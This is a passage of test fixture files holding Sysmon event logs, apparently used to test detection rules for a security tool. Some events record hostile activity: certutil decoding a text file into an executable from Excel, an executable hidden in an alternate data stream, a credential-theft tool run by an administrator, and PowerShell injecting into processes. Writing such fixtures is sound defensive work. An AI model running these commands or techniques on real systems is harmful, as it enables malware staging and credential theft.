"1456", 33 | "ThreadID": "1712" 34 | }, 35 | "Keywords": "0x8000000000000000", 36 | "Level": "4", 37 | "Opcode": "0", 38 | "Provider": { 39 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 40 | "Name": "Microsoft-Windows-Sysmon" 41 | }, 42 | "Security": { 43 | "UserID": "S-1-5-18" 44 | }, 45 | "Task": "1", 46 | "TimeCreated": { 47 | "SystemTime": "4242-04-24 13:37:42.422" 48 | }, 49 | "Version": "5" 50 | } 51 | } 52 | } 53 | { 54 | "Event": { 55 | "EventData": { 56 | "CommandLine": "\"cmd\" /c dir \"C:\\Users\\*admin*\" /b /s /a-d", 57 | "Company": "Microsoft Corporation", 58 | "CurrentDirectory": "C:\\Windows\\system32\\", 59 | "Description": "Windows Command Processor", 60 | "FileVersion": "6.1.7601.17514 (win7sp1_rtm.101119-1850)", 61 | "Hashes": "SHA1=0F3C4FF28F354AEDE202D54E9D1C5529A3BF87D8,MD5=5746BD7E255DD6A8AFA06F7C42C1BA41,SHA256=DB06C3534964E3FC79D2763144BA53742D7FA250CA336F4A0FE724B75AAFF386,IMPHASH=D0058544E4588B1B2290B7F4D830EB0A", 62 | "Image": "C:\\Windows\\System32\\cmd.exe", 63 | "IntegrityLevel": "System", 64 | "LogonGuid": "{49F1AF32-356A-5AC7-0000-0020E7030000}", 65 | "LogonId": "0x3e7", 66 | "ParentCommandLine": "C:\\commander.exe -f", 67 | "ParentImage": "C:\\commander.exe", 68 | "ParentProcessGuid": "{49F1AF32-38A7-5AC7-0000-0010869A0A00}", 69 | "ParentProcessId": "920", 70 | "ProcessGuid": "{49F1AF32-38CB-5AC7-0000-00106D140D00}", 71 | "ProcessId": "1004", 72 | "Product": "Microsoft® Windows® Operating System", 73 | "TerminalSessionId": "0", 74 | "User": "NT AUTHORITY\\SYSTEM", 75 | "UtcTime": "4242-04-24 13:37:42.422" 76 | }, 77 | "System": { 78 | "Channel": "Microsoft-Windows-Sysmon/Operational", 79 | "Computer": "BLAHBLAH", 80 | "Correlation": {}, 81 | "EventID": "1", 82 | "EventRecordID": "898333", 83 | "Execution": { 84 | "ProcessID": "1456", 85 | "ThreadID": "1712" 86 | }, 87 | "Keywords": "0x8000000000000000", 88 | "Level": "4", 89 | "Opcode": "0", 90 | "Provider": { 91 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 92 | 
"Name": "Microsoft-Windows-Sysmon" 93 | }, 94 | "Security": { 95 | "UserID": "S-1-5-18" 96 | }, 97 | "Task": "1", 98 | "TimeCreated": { 99 | "SystemTime": "4242-04-24 13:37:42.422" 100 | }, 101 | "Version": "5" 102 | } 103 | } 104 | } 105 | -------------------------------------------------------------------------------- /tests/CertutilSuspDecode.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "CommandLine": "certutil -decode C:\\Programdata\\B4V2N7R2.txt C:\\Programdata\\Q7Y9F5Z1.exe", 5 | "CurrentDirectory": "C:\\Users\\Gen Eric\\Documents\\", 6 | "Hashes": "SHA1=8186D64DD28CD63CA883B1D3CE5F07AEABAD67C0,MD5=0D52559AEF4AA5EAC82F530617032283,SHA256=48850FB7229D99E48C3A749556684E962587058D612C659C58F8B8DB2D00ABEE,IMPHASH=61FA242F31501799B46DF49B9FCC76BB", 7 | "Image": "C:\\Windows\\SysWOW64\\certutil.exe", 8 | "IntegrityLevel": "Medium", 9 | "LogonGuid": "{49F1AF32-651B-5ABB-0000-00205D120100}", 10 | "LogonId": "0x1125d", 11 | "ParentCommandLine": "\"C:\\Program Files (x86)\\Microsoft Office\\Office12\\EXCEL.EXE\" /e", 12 | "ParentImage": "C:\\Program Files (x86)\\Microsoft Office\\Office12\\EXCEL.EXE", 13 | "ParentProcessGuid": "{49F1AF32-001D-5AD6-0000-0010A0430D00}", 14 | "ParentProcessId": "2700", 15 | "ProcessGuid": "{49F1AF32-002F-5AD6-0000-0010A2FF0D00}", 16 | "ProcessId": "2304", 17 | "TerminalSessionId": "1", 18 | "User": "GenEric-PC\\Gen Eric", 19 | "UtcTime": "4242-04-24 13:37:42.422" 20 | }, 21 | "System": { 22 | "Channel": "Microsoft-Windows-Sysmon/Operational", 23 | "Computer": "BLAHBLAH", 24 | "Correlation": {}, 25 | "EventID": "1", 26 | "EventRecordID": "35471", 27 | "Execution": { 28 | "ProcessID": "2948", 29 | "ThreadID": "3028" 30 | }, 31 | "Keywords": "0x8000000000000000", 32 | "Level": "4", 33 | "Opcode": "0", 34 | "Provider": { 35 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 36 | "Name": "Microsoft-Windows-Sysmon" 37 | }, 38 | "Security": { 39 | "UserID": 
"S-1-5-18" 40 | }, 41 | "Task": "1", 42 | "TimeCreated": { 43 | "SystemTime": "4242-04-24 13:37:42.422" 44 | }, 45 | "Version": "5" 46 | } 47 | } 48 | } 49 | { 50 | "Event": { 51 | "EventData": { 52 | "CommandLine": "certutil -decode C:\\Programdata\\B7O7M3G7.txt C:\\Programdata\\Q1S5F1P6.exe", 53 | "CurrentDirectory": "C:\\Users\\Gen Eric\\Documents\\", 54 | "Hashes": "SHA1=8186D64DD28CD63CA883B1D3CE5F07AEABAD67C0,MD5=0D52559AEF4AA5EAC82F530617032283,SHA256=48850FB7229D99E48C3A749556684E962587058D612C659C58F8B8DB2D00ABEE,IMPHASH=61FA242F31501799B46DF49B9FCC76BB", 55 | "Image": "C:\\Windows\\SysWOW64\\certutil.exe", 56 | "IntegrityLevel": "Medium", 57 | "LogonGuid": "49F1AF32-6417-5A74-0000-002065780100", 58 | "LogonId": "0x00017865", 59 | "ParentCommandLine": "\"C:\\Program Files (x86)\\Microsoft Office\\Office12\\EXCEL.EXE\" /e", 60 | "ParentImage": "C:\\Program Files (x86)\\Microsoft Office\\Office12\\EXCEL.EXE", 61 | "ParentProcessGuid": "49F1AF32-64C3-5A74-0000-0010122C0900", 62 | "ParentProcessId": "1940", 63 | "ProcessGuid": "49F1AF32-64CB-5A74-0000-00101C630900", 64 | "ProcessId": "1924", 65 | "TerminalSessionId": "1", 66 | "User": "GenEric-PC\\Gen Eric", 67 | "UtcTime": "4242-04-24 13:37:42.422" 68 | }, 69 | "System": { 70 | "Channel": "Microsoft-Windows-Sysmon/Operational", 71 | "Computer": "BLAHBLAH", 72 | "Correlation": {}, 73 | "EventID": "1", 74 | "EventRecordID": "103685", 75 | "Execution": { 76 | "ProcessID": "1376", 77 | "ThreadID": "1964" 78 | }, 79 | "Keywords": "0x8000000000000000", 80 | "Level": "4", 81 | "Opcode": "0", 82 | "Provider": { 83 | "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9", 84 | "Name": "Microsoft-Windows-Sysmon" 85 | }, 86 | "Security": { 87 | "UserID": "S-1-5-18" 88 | }, 89 | "Task": "1", 90 | "TimeCreated": { 91 | "SystemTime": "4242-04-24 13:37:42.422" 92 | }, 93 | "Version": "5" 94 | } 95 | } 96 | } 97 | -------------------------------------------------------------------------------- /tests/DownloadPath.json: 
-------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "CommandLine": "\"C:\\Users\\calduser1\\Downloads\\Invoke-Monologue\\Internal-Monologue-master\\InternalMonologue\\bin\\Release\\InternalMonologue.exe\"", 5 | "Company": "", 6 | "CurrentDirectory": "C:\\Users\\calduser1\\Downloads\\Invoke-Monologue\\Internal-Monologue-master\\InternalMonologue\\bin\\Release\\", 7 | "Description": "InternalMonologue", 8 | "FileVersion": "1.0.0.0", 9 | "Hashes": "SHA1=A4EB70393F1709775FAED9D8858FCEBE64B62D7B,MD5=AA3B91AE725EC3FFE3BF112AD66BEB58,SHA256=3CAD10BB61B98B7F077746CE32A4ACA07FFB484B17A5F20B51864A99348C497F,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744", 10 | "Image": "C:\\Users\\calduser1\\Downloads\\Invoke-Monologue\\Internal-Monologue-master\\InternalMonologue\\bin\\Release\\InternalMonologue.exe", 11 | "IntegrityLevel": "High", 12 | "LogonGuid": "{49F1AF32-11F0-5A90-0000-002047700900}", 13 | "LogonId": "0x97047", 14 | "ParentCommandLine": "\"C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\" ", 15 | "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", 16 | "ParentProcessGuid": "{49F1AF32-11F1-5A90-0000-00107E7D0900}", 17 | "ParentProcessId": "2856", 18 | "ProcessGuid": "{49F1AF32-393C-5A94-0000-0010BB401200}", 19 | "ProcessId": "1556", 20 | "Product": "InternalMonologue", 21 | "TerminalSessionId": "1", 22 | "User": "CALDERA\\Administrator", 23 | "UtcTime": "4242-04-24 13:37:42.422" 24 | }, 25 | "System": { 26 | "Channel": "Microsoft-Windows-Sysmon/Operational", 27 | "Computer": "BLAHBLAH", 28 | "Correlation": {}, 29 | "EventID": "1", 30 | "EventRecordID": "1289286", 31 | "Execution": { 32 | "ProcessID": "1408", 33 | "ThreadID": "1652" 34 | }, 35 | "Keywords": "0x8000000000000000", 36 | "Level": "4", 37 | "Opcode": "0", 38 | "Provider": { 39 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 40 | "Name": "Microsoft-Windows-Sysmon" 41 | }, 42 | "Security": { 43 | 
"UserID": "S-1-5-18" 44 | }, 45 | "Task": "1", 46 | "TimeCreated": { 47 | "SystemTime": "4242-04-24 13:37:42.422" 48 | }, 49 | "Version": "5" 50 | } 51 | } 52 | } 53 | -------------------------------------------------------------------------------- /tests/ExecDownloadedDocument.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "CommandLine": "\"C:\\Users\\calduser1\\Downloads\\Invoke-Monologue\\Internal-Monologue-master\\InternalMonologue\\bin\\Release\\InternalMonologue.exe\"", 5 | "Company": "", 6 | "CurrentDirectory": "C:\\Users\\calduser1\\Downloads\\Invoke-Monologue\\Internal-Monologue-master\\InternalMonologue\\bin\\Release\\", 7 | "Description": "InternalMonologue", 8 | "FileVersion": "1.0.0.0", 9 | "Hashes": "SHA1=A4EB70393F1709775FAED9D8858FCEBE64B62D7B,MD5=AA3B91AE725EC3FFE3BF112AD66BEB58,SHA256=3CAD10BB61B98B7F077746CE32A4ACA07FFB484B17A5F20B51864A99348C497F,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744", 10 | "Image": "C:\\Users\\calduser1\\Downloads\\Invoke-Monologue\\Internal-Monologue-master\\InternalMonologue\\bin\\Release\\InternalMonologue.exe", 11 | "IntegrityLevel": "High", 12 | "LogonGuid": "{49F1AF32-11F0-5A90-0000-002047700900}", 13 | "LogonId": "0x97047", 14 | "ParentCommandLine": "\"C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\" ", 15 | "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", 16 | "ParentProcessGuid": "{49F1AF32-11F1-5A90-0000-00107E7D0900}", 17 | "ParentProcessId": "2856", 18 | "ProcessGuid": "{49F1AF32-393C-5A94-0000-0010BB401200}", 19 | "ProcessId": "1556", 20 | "Product": "InternalMonologue", 21 | "TerminalSessionId": "1", 22 | "User": "CALDERA\\Administrator", 23 | "UtcTime": "4242-04-24 13:37:42.422" 24 | }, 25 | "System": { 26 | "Channel": "Microsoft-Windows-Sysmon/Operational", 27 | "Computer": "BLAHBLAH", 28 | "Correlation": {}, 29 | "EventID": "1", 30 | "EventRecordID": "1289286", 31 | "Execution": 
{ 32 | "ProcessID": "1408", 33 | "ThreadID": "1652" 34 | }, 35 | "Keywords": "0x8000000000000000", 36 | "Level": "4", 37 | "Opcode": "0", 38 | "Provider": { 39 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 40 | "Name": "Microsoft-Windows-Sysmon" 41 | }, 42 | "Security": { 43 | "UserID": "S-1-5-18" 44 | }, 45 | "Task": "1", 46 | "TimeCreated": { 47 | "SystemTime": "4242-04-24 13:37:42.422" 48 | }, 49 | "Version": "5" 50 | } 51 | } 52 | } 53 | -------------------------------------------------------------------------------- /tests/ExecutableADS.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "CreationUtcTime": "2018-02-23 13:17:31.176", 5 | "Hash": "SHA1=E8B4D84A28E5EA17272416EC45726964FDF25883,MD5=09F7401D56F2393C6CA534FF0241A590,SHA256=6766717B8AFAFE46B5FD66C7082CCCE6B382CBEA982C73CB651E35DC8187ACE1,IMPHASH=68E56344CAB250384904953E978B70A9", 6 | "Image": "C:\\Windows\\system32\\cmd.exe", 7 | "ProcessGuid": "{49F1AF32-12C5-5A90-0000-00100AEA0B00}", 8 | "ProcessId": "2100", 9 | "TargetFilename": "C:\\Users\\CALDUS~1\\AppData\\Local\\Temp\\test.txt:malicious.exe", 10 | "UtcTime": "4242-04-24 13:37:42.422" 11 | }, 12 | "System": { 13 | "Channel": "Microsoft-Windows-Sysmon/Operational", 14 | "Computer": "BLAHBLAH", 15 | "Correlation": {}, 16 | "EventID": "15", 17 | "EventRecordID": "1274680", 18 | "Execution": { 19 | "ProcessID": "1408", 20 | "ThreadID": "1652" 21 | }, 22 | "Keywords": "0x8000000000000000", 23 | "Level": "4", 24 | "Opcode": "0", 25 | "Provider": { 26 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 27 | "Name": "Microsoft-Windows-Sysmon" 28 | }, 29 | "Security": { 30 | "UserID": "S-1-5-18" 31 | }, 32 | "Task": "15", 33 | "TimeCreated": { 34 | "SystemTime": "4242-04-24 13:37:42.422" 35 | }, 36 | "Version": "2" 37 | } 38 | } 39 | } 40 | { 41 | "Event": { 42 | "EventData": { 43 | "CreationUtcTime": "2018-02-23 13:21:35.152", 44 | "Hash": 
"SHA1=E8B4D84A28E5EA17272416EC45726964FDF25883,MD5=09F7401D56F2393C6CA534FF0241A590,SHA256=6766717B8AFAFE46B5FD66C7082CCCE6B382CBEA982C73CB651E35DC8187ACE1,IMPHASH=68E56344CAB250384904953E978B70A9", 45 | "Image": "C:\\Windows\\system32\\cmd.exe", 46 | "ProcessGuid": "{49F1AF32-12C5-5A90-0000-00100AEA0B00}", 47 | "ProcessId": "2100", 48 | "TargetFilename": "C:\\Users\\CALDUS~1\\AppData\\Local\\Temp\\test2.txt:malicious.exe", 49 | "UtcTime": "4242-04-24 13:37:42.422" 50 | }, 51 | "System": { 52 | "Channel": "Microsoft-Windows-Sysmon/Operational", 53 | "Computer": "BLAHBLAH", 54 | "Correlation": {}, 55 | "EventID": "15", 56 | "EventRecordID": "1275071", 57 | "Execution": { 58 | "ProcessID": "1408", 59 | "ThreadID": "1652" 60 | }, 61 | "Keywords": "0x8000000000000000", 62 | "Level": "4", 63 | "Opcode": "0", 64 | "Provider": { 65 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 66 | "Name": "Microsoft-Windows-Sysmon" 67 | }, 68 | "Security": { 69 | "UserID": "S-1-5-18" 70 | }, 71 | "Task": "15", 72 | "TimeCreated": { 73 | "SystemTime": "4242-04-24 13:37:42.422" 74 | }, 75 | "Version": "2" 76 | } 77 | } 78 | } 79 | -------------------------------------------------------------------------------- /tests/ExecutableFileCreated.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "CreationUtcTime": "2018-04-06 09:12:49.697", 5 | "Image": "System", 6 | "ProcessGuid": "{8C352DC7-327F-5AC7-0000-0010EB030000}", 7 | "ProcessId": "4", 8 | "TargetFilename": "C:\\Windows\\PSEXESVC.exe", 9 | "UtcTime": "4242-04-24 13:37:42.422" 10 | }, 11 | "System": { 12 | "Channel": "Microsoft-Windows-Sysmon/Operational", 13 | "Computer": "BLAHBLAH", 14 | "Correlation": {}, 15 | "EventID": "11", 16 | "EventRecordID": "237698", 17 | "Execution": { 18 | "ProcessID": "1568", 19 | "ThreadID": "1984" 20 | }, 21 | "Keywords": "0x8000000000000000", 22 | "Level": "4", 23 | "Opcode": "0", 24 | "Provider": { 25 | "Guid": 
"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 26 | "Name": "Microsoft-Windows-Sysmon" 27 | }, 28 | "Security": { 29 | "UserID": "S-1-5-18" 30 | }, 31 | "Task": "11", 32 | "TimeCreated": { 33 | "SystemTime": "4242-04-24 13:37:42.422" 34 | }, 35 | "Version": "2" 36 | } 37 | } 38 | } 39 | { 40 | "Event": { 41 | "EventData": { 42 | "CreationUtcTime": "2018-04-06 08:48:25.953", 43 | "Image": "System", 44 | "ProcessGuid": "{8C352DC7-327F-5AC7-0000-0010EB030000}", 45 | "ProcessId": "4", 46 | "TargetFilename": "C:\\Windows\\crater.exe", 47 | "UtcTime": "4242-04-24 13:37:42.422" 48 | }, 49 | "System": { 50 | "Channel": "Microsoft-Windows-Sysmon/Operational", 51 | "Computer": "BLAHBLAH", 52 | "Correlation": {}, 53 | "EventID": "11", 54 | "EventRecordID": "237796", 55 | "Execution": { 56 | "ProcessID": "1568", 57 | "ThreadID": "1984" 58 | }, 59 | "Keywords": "0x8000000000000000", 60 | "Level": "4", 61 | "Opcode": "0", 62 | "Provider": { 63 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 64 | "Name": "Microsoft-Windows-Sysmon" 65 | }, 66 | "Security": { 67 | "UserID": "S-1-5-18" 68 | }, 69 | "Task": "11", 70 | "TimeCreated": { 71 | "SystemTime": "4242-04-24 13:37:42.422" 72 | }, 73 | "Version": "2" 74 | } 75 | } 76 | } 77 | { 78 | "Event": { 79 | "EventData": { 80 | "CreationUtcTime": "2018-04-06 09:16:19.947", 81 | "Image": "System", 82 | "ProcessGuid": "{8C352DC7-327F-5AC7-0000-0010EB030000}", 83 | "ProcessId": "4", 84 | "TargetFilename": "C:\\commander.exe", 85 | "UtcTime": "4242-04-24 13:37:42.422" 86 | }, 87 | "System": { 88 | "Channel": "Microsoft-Windows-Sysmon/Operational", 89 | "Computer": "BLAHBLAH", 90 | "Correlation": {}, 91 | "EventID": "11", 92 | "EventRecordID": "239376", 93 | "Execution": { 94 | "ProcessID": "1568", 95 | "ThreadID": "1984" 96 | }, 97 | "Keywords": "0x8000000000000000", 98 | "Level": "4", 99 | "Opcode": "0", 100 | "Provider": { 101 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 102 | "Name": "Microsoft-Windows-Sysmon" 103 | }, 104 | 
"Security": { 105 | "UserID": "S-1-5-18" 106 | }, 107 | "Task": "11", 108 | "TimeCreated": { 109 | "SystemTime": "4242-04-24 13:37:42.422" 110 | }, 111 | "Version": "2" 112 | } 113 | } 114 | } 115 | -------------------------------------------------------------------------------- /tests/ExplorerInjection.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "CallTrace": "C:\\Windows\\SYSTEM32\\ntdll.dll+5157a|C:\\Windows\\system32\\KERNELBASE.dll+d817|C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorwks.dll+2c0e37|UNKNOWN(000007FF002A0A6A)", 5 | "GrantedAccess": "0x1f1fff", 6 | "RuleName": "", 7 | "SourceImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", 8 | "SourceIntegrityLevel": "Medium", 9 | "SourceProcessGUID": "{49F1AF32-95E7-5D48-0000-00107E820800}", 10 | "SourceProcessId": "2404", 11 | "SourceServices": "N/A", 12 | "SourceThreadId": "2624", 13 | "SourceUser": "GenEric-PC\\Gen Eric", 14 | "TargetImage": "C:\\Windows\\Explorer.EXE", 15 | "TargetIntegrityLevel": "Medium", 16 | "TargetParentProcessGuid": "{49F1AF32-9595-5D48-0000-00100CCF0400}", 17 | "TargetProcessGUID": "{49F1AF32-9596-5D48-0000-0010C6DC0400}", 18 | "TargetProcessId": "1140", 19 | "TargetServices": "N/A", 20 | "TargetUser": "GenEric-PC\\Gen Eric", 21 | "UtcTime": "4242-04-24 13:37:42.422" 22 | }, 23 | "System": { 24 | "Channel": "Microsoft-Windows-Sysmon/Operational", 25 | "Computer": "BLAHBLAH", 26 | "Correlation": {}, 27 | "EventID": "10", 28 | "EventRecordID": "7796592", 29 | "Execution": { 30 | "ProcessID": "1640", 31 | "ThreadID": "1848" 32 | }, 33 | "Keywords": "0x8000000000000000", 34 | "Level": "4", 35 | "Opcode": "0", 36 | "Provider": { 37 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 38 | "Name": "Microsoft-Windows-Sysmon" 39 | }, 40 | "Security": { 41 | "UserID": "S-1-5-18" 42 | }, 43 | "Task": "10", 44 | "TimeCreated": { 45 | "SystemTime": "4242-04-24 13:37:42.422" 46 | 
}, 47 | "Version": "3" 48 | } 49 | } 50 | } 51 | -------------------------------------------------------------------------------- /tests/Heur7zExec.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "CommandLine": "\"C:\\Users\\Gen Eric\\Desktop\\sublimetext3_2017-09-07T22-42-01+02-00\\sublime_text.exe\" \"C:\\Users\\GENERI~1\\AppData\\Local\\Temp\\7zO4D41B24D\\sysmon.json\"", 5 | "CurrentDirectory": "C:\\Users\\GENERI~1\\AppData\\Local\\Temp\\7zO4D41B24D\\", 6 | "Hashes": "SHA1=7A783002F801C3A843ECDC2835CCCACA7E0997FA,MD5=6CC9F0CBBB6A1FACA78FF64045EAFBCA,SHA256=8A40399733979DADAFE62214FB4DFD681C6C200F1D349EE5FD691C7B876F4F8A,IMPHASH=9FFB2610B37BAABBC88392CD288253E6", 7 | "Image": "C:\\Users\\Gen Eric\\Desktop\\sublimetext3_2017-09-07T22-42-01+02-00\\sublime_text.exe", 8 | "IntegrityLevel": "Medium", 9 | "LogonGuid": "49F1AF32-4E59-59BD-0000-0020F6700100", 10 | "LogonId": "0x000170f6", 11 | "ParentCommandLine": "\"C:\\Program Files\\7-Zip\\7zFM.exe\" \"C:\\Program Files\\RawSecTools\\sysmon.json.gz\"", 12 | "ParentImage": "C:\\Program Files\\7-Zip\\7zFM.exe", 13 | "ParentProcessGuid": "49F1AF32-7C11-59BF-0000-0010E8262F00", 14 | "ParentProcessId": "1236", 15 | "ProcessGuid": "49F1AF32-7C13-59BF-0000-00108A342F00", 16 | "ProcessId": "2088", 17 | "TerminalSessionId": "1", 18 | "User": "GenEric-PC\\Gen Eric", 19 | "UtcTime": "4242-04-24 13:37:42.422" 20 | }, 21 | "System": { 22 | "Channel": "Microsoft-Windows-Sysmon/Operational", 23 | "Computer": "BLAHBLAH", 24 | "Correlation": {}, 25 | "EventID": "1", 26 | "EventRecordID": "702650", 27 | "Execution": { 28 | "ProcessID": "1332", 29 | "ThreadID": "1924" 30 | }, 31 | "Keywords": "0x8000000000000000", 32 | "Level": "4", 33 | "Opcode": "0", 34 | "Provider": { 35 | "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9", 36 | "Name": "Microsoft-Windows-Sysmon" 37 | }, 38 | "Security": { 39 | "UserID": "S-1-5-18" 40 | }, 41 | "Task": "1", 42 | 
"TimeCreated": { 43 | "SystemTime": "4242-04-24 13:37:42.422" 44 | }, 45 | "Version": "5" 46 | } 47 | } 48 | } 49 | -------------------------------------------------------------------------------- /tests/HeurCallShellcode.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "NewThreadId": "2208", 5 | "SourceImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", 6 | "SourceProcessGuid": "49F1AF32-D3BB-59DC-0000-0010BE140900", 7 | "SourceProcessId": "948", 8 | "StartAddress": "0x0000000000250690", 9 | "StartFunction": "", 10 | "StartModule": "", 11 | "TargetImage": "C:\\Windows\\System32\\notepad.exe", 12 | "TargetProcessGuid": "49F1AF32-D423-59DC-0000-001050310B00", 13 | "TargetProcessId": "2640", 14 | "UtcTime": "4242-04-24 13:37:42.422" 15 | }, 16 | "System": { 17 | "Channel": "Microsoft-Windows-Sysmon/Operational", 18 | "Computer": "BLAHBLAH", 19 | "Correlation": {}, 20 | "EventID": "8", 21 | "EventRecordID": "61733", 22 | "Execution": { 23 | "ProcessID": "1376", 24 | "ThreadID": "1936" 25 | }, 26 | "Keywords": "0x8000000000000000", 27 | "Level": "4", 28 | "Opcode": "0", 29 | "Provider": { 30 | "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9", 31 | "Name": "Microsoft-Windows-Sysmon" 32 | }, 33 | "Security": { 34 | "UserID": "S-1-5-18" 35 | }, 36 | "Task": "8", 37 | "TimeCreated": { 38 | "SystemTime": "4242-04-24 13:37:42.422" 39 | }, 40 | "Version": "2" 41 | } 42 | } 43 | } 44 | -------------------------------------------------------------------------------- /tests/HeurDropper.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "CreationUtcTime": "2017-10-09 10:01:34.311", 5 | "Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\poWERShell.exe", 6 | "ProcessGuid": "49F1AF32-48FD-59DB-0000-00108C980D00", 7 | "ProcessId": "2180", 8 | "TargetFilename": "C:\\Users\\Gen 
Eric\\AppData\\Local\\Temp\\10454.exe", 9 | "UtcTime": "4242-04-24 13:37:42.422" 10 | }, 11 | "System": { 12 | "Channel": "Microsoft-Windows-Sysmon/Operational", 13 | "Computer": "BLAHBLAH", 14 | "Correlation": {}, 15 | "EventID": "11", 16 | "EventRecordID": "34213", 17 | "Execution": { 18 | "ProcessID": "2160", 19 | "ThreadID": "2380" 20 | }, 21 | "Keywords": "0x8000000000000000", 22 | "Level": "4", 23 | "Opcode": "0", 24 | "Provider": { 25 | "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9", 26 | "Name": "Microsoft-Windows-Sysmon" 27 | }, 28 | "Security": { 29 | "UserID": "S-1-5-18" 30 | }, 31 | "Task": "11", 32 | "TimeCreated": { 33 | "SystemTime": "4242-04-24 13:37:42.422" 34 | }, 35 | "Version": "2" 36 | } 37 | } 38 | } 39 | { 40 | "Event": { 41 | "EventData": { 42 | "CreationUtcTime": "2017-10-09 10:01:34.311", 43 | "Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\poWERShell.exe", 44 | "ProcessGuid": "49F1AF32-48FD-59DB-0000-00108C980D00", 45 | "ProcessId": "2180", 46 | "TargetFilename": "C:\\Users\\Gen Eric\\AppData\\Local\\Temp\\10454.exe", 47 | "UtcTime": "4242-04-24 13:37:42.422" 48 | }, 49 | "System": { 50 | "Channel": "Microsoft-Windows-Sysmon/Operational", 51 | "Computer": "BLAHBLAH", 52 | "Correlation": {}, 53 | "EventID": "11", 54 | "EventRecordID": "34214", 55 | "Execution": { 56 | "ProcessID": "2160", 57 | "ThreadID": "2380" 58 | }, 59 | "Keywords": "0x8000000000000000", 60 | "Level": "4", 61 | "Opcode": "0", 62 | "Provider": { 63 | "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9", 64 | "Name": "Microsoft-Windows-Sysmon" 65 | }, 66 | "Security": { 67 | "UserID": "S-1-5-18" 68 | }, 69 | "Task": "11", 70 | "TimeCreated": { 71 | "SystemTime": "4242-04-24 13:37:42.422" 72 | }, 73 | "Version": "2" 74 | } 75 | } 76 | } 77 | { 78 | "Event": { 79 | "EventData": { 80 | "CreationUtcTime": "2017-10-09 10:01:34.311", 81 | "Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\poWERShell.exe", 82 | "ProcessGuid": "49F1AF32-48FD-59DB-0000-00108C980D00", 
83 | "ProcessId": "2180", 84 | "TargetFilename": "C:\\Users\\Gen Eric\\AppData\\Local\\Temp\\10454.exe", 85 | "UtcTime": "4242-04-24 13:37:42.422" 86 | }, 87 | "System": { 88 | "Channel": "Microsoft-Windows-Sysmon/Operational", 89 | "Computer": "BLAHBLAH", 90 | "Correlation": {}, 91 | "EventID": "11", 92 | "EventRecordID": "34215", 93 | "Execution": { 94 | "ProcessID": "2160", 95 | "ThreadID": "2380" 96 | }, 97 | "Keywords": "0x8000000000000000", 98 | "Level": "4", 99 | "Opcode": "0", 100 | "Provider": { 101 | "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9", 102 | "Name": "Microsoft-Windows-Sysmon" 103 | }, 104 | "Security": { 105 | "UserID": "S-1-5-18" 106 | }, 107 | "Task": "11", 108 | "TimeCreated": { 109 | "SystemTime": "4242-04-24 13:37:42.422" 110 | }, 111 | "Version": "2" 112 | } 113 | } 114 | } 115 | { 116 | "Event": { 117 | "EventData": { 118 | "CreationUtcTime": "2017-10-09 10:01:34.311", 119 | "Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\poWERShell.exe", 120 | "ProcessGuid": "49F1AF32-48FD-59DB-0000-00108C980D00", 121 | "ProcessId": "2180", 122 | "TargetFilename": "C:\\Users\\Gen Eric\\AppData\\Local\\Temp\\10454.exe", 123 | "UtcTime": "4242-04-24 13:37:42.422" 124 | }, 125 | "System": { 126 | "Channel": "Microsoft-Windows-Sysmon/Operational", 127 | "Computer": "BLAHBLAH", 128 | "Correlation": {}, 129 | "EventID": "11", 130 | "EventRecordID": "34216", 131 | "Execution": { 132 | "ProcessID": "2160", 133 | "ThreadID": "2380" 134 | }, 135 | "Keywords": "0x8000000000000000", 136 | "Level": "4", 137 | "Opcode": "0", 138 | "Provider": { 139 | "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9", 140 | "Name": "Microsoft-Windows-Sysmon" 141 | }, 142 | "Security": { 143 | "UserID": "S-1-5-18" 144 | }, 145 | "Task": "11", 146 | "TimeCreated": { 147 | "SystemTime": "4242-04-24 13:37:42.422" 148 | }, 149 | 